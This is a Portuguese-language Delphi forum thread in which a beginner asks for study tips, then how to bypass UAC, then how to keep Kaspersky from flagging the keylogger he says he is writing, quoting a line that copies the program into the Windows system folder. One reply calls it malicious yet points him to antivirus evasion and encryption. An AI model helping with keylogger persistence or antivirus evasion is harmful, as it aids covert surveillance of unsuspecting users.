Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Começando delphi

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Duvida Começando delphi

    Pessoal,

    estou começando o delphi agora. Já estudei o Pascal, e agora decidir passa para o mesmo.
    Eu estou estudando da seguinte maneira:

    Os comando do delphi eu sei praticamente "quase todos", ae quando eu quero fazer algum programa do meu jeito precisa usar muitas API's do Windows, então eu pego alguns exemplos na net ou sources ja prontas e tento enteder, na maioria das vezes consigo inteder, só que n consigo memorizar os comandos.

    Na opnião d vc's, desse geito eu consigo aprender a programar em delphi, ou eu tenho q estudar d outra maneira?

    E se vc's tiverem alguns site, tuto que ensine mas sobre API do windows, por favor, posta ae!

    Bem é isso!
    Desde de já muito obrigado a todos q me ajudar!

  • Font Size
    #2
    Pô, ninguem para da uma dica?
    Apenas um comentario ja serve!

    Comment


    • Font Size
      #3
      isso é um bom começo, tente ler livros sobre o assunto , ver sources de programas mais complexos , e continue fazendo os seus , é sempre bom praticar

      Comment


      • Font Size
        #4
        Cara eu comecei a estudar pela lógica de programação, depois eu fui pela as apostila de Delphi de sintaxe como monta o código, depois fui para apostilas e outro assuntos e comecei a estuda banco de dados.

        Tem varias apostilas na net com bom conteúdos
        É claro que meus filhos terão computadores, mas antes terão livros

        Comment


        • Font Size
          #5
          Vlw pelos comentarios.

          Comment


          • Font Size
            #6
            Desculpe o flood, mas foi um erro aqui, e enviei a mensagem sem querer.

            Voltando ao assunto, Muito obrigado pelos comentarios e vou continuar estudadando.

            jeanlucasxp, acho q vou deixar banco de dados para quando tiver bom em delphi, agora só quero aprender mesmo o delphi.

            Abraço a todos...

            Comment


            • Font Size
              #7
              Ae pessoal,
              alguem sabe como eu executo minha aplicação com privilégios administrativos?
              Se saber posta ae!

              Comment


              • Font Size
                #8
                Tem várias alternativas, vou te dar duas:
                1 - (Fácil) Não sei qual windows você utiliza nem versão de delphi, se for versão mais recente use o componente vista manifest , em alguns casos não irá abrir o Cotrole (UAC).
                2 - (Intermediário) Você irá criar um .xml que irá mesclar junto com seu aplicativo, ele irá enganar o UAC.
                Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (Delphi.about.com)

                Comment


                • Font Size
                  #9
                  Postado Originalmente por joeyS Ver Post
                  Tem várias alternativas, vou te dar duas:
                  1 - (Fácil) Não sei qual windows você utiliza nem versão de delphi, se for versão mais recente use o componente vista manifest , em alguns casos não irá abrir o Cotrole (UAC).
                  2 - (Intermediário) Você irá criar um .xml que irá mesclar junto com seu aplicativo, ele irá enganar o UAC.
                  Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (Delphi.about.com)
                  Eu já tentei criar o XML, mas não consegui!
                  Será q vc pode disponibilizar alguns site como o XML pronto para min implementar minha aplicação?

                  Não entedi Muito bem a outra parte!

                  Obs: Estou usando o Win7 e Delphi7.

                  Comment


                  • Font Size
                    #10
                    No final da página ele diz que criou um projeto para criar o "manifest" automático , sem ter burocracia.

                    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

                    Comment


                    • Font Size
                      #11
                      Sem querer abusar, estou com outra dúvida aqui!

                      É o seguinte:

                      Estou a desenvolver um kl aqui. Meu AV (o KIS) não detecta nda, mas quando coloco a função de copiar ele detonar o arqui na hora. Teria como eu burla isso?

                      a função q estou usando é essa:

                      copyfile(pchar(application.Exename), pchar(system+'\arquivo.exe'), false);

                      System = diretorio do windwos.

                      O código funciona normalmente sem ser detectado, mas é só colocar para copiar ele pega!

                      Comment


                      • Font Size
                        #12
                        Sem querer abusar, estou com outra dúvida aqui!

                        É o seguinte:

                        Estou a desenvolver um kl aqui. Meu AV (o KIS) não detecta nda, mas quando coloco a função de copiar ele detonar o arqui na hora. Teria como eu burla isso?

                        a função q estou usando é essa:

                        copyfile(pchar(application.Exename), pchar(system+'\arquivo.exe'), false);

                        System = diretorio do windwos.

                        O código funciona normalmente sem ser detectado, mas é só colocar para copiar ele pega!

                        Comment


                        • Font Size
                          #13
                          Amigo tem algumas apostilas de delphi nesse site aqui
                          de uma olhada e se la nao tiver deixa um comemtario que o cara la coloca ela pra vc.
                          espero ter ajudado

                          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
                          "Memorizando o presente e processando o futuro"!!!

                          site do Aprendiz.
                          http://www.delphivisao.blogspot.com/

                          Comment


                          • Font Size
                            #14
                            Postado Originalmente por cesargbi16 Ver Post
                            Sem querer abusar, estou com outra dúvida aqui!

                            É o seguinte:

                            Estou a desenvolver um kl aqui. Meu AV (o KIS) não detecta nda, mas quando coloco a função de copiar ele detonar o arqui na hora. Teria como eu burla isso?

                            a função q estou usando é essa:

                            copyfile(pchar(application.Exename), pchar(system+'\arquivo.exe'), false);

                            System = diretorio do windwos.

                            O código funciona normalmente sem ser detectado, mas é só colocar para copiar ele pega!
                            Sinceridade para com você, há 10 dias você criou este tópico dizendo que está começando delphi, e está começando com o desenvolvimento de um Keylogger?
                            Assim você irá demorar mais para aprender, porém, sobre o código até minha vó com problema de catarata saberia identificar que isto é um código malicioso.
                            Uma dica para você, procure artigos sobre heurística de anti-virus, como burlar, criptografar e por aí vai.

                            Comment


                            • Font Size
                              #15
                              Postado Originalmente por joeyS Ver Post
                              Sinceridade para com você, há 10 dias você criou este tópico dizendo que está começando delphi, e está começando com o desenvolvimento de um Keylogger?
                              Assim você irá demorar mais para aprender, porém, sobre o código até minha vó com problema de catarata saberia identificar que isto é um código malicioso.
                              Uma dica para você, procure artigos sobre heurística de anti-virus, como burlar, criptografar e por aí vai.
                              E o que vc me recomenda para começar e "aprender mais rapido"?

                              Se vc diz que assim vai demorar mais!

                              Comment

                              X
                              Working...
                              X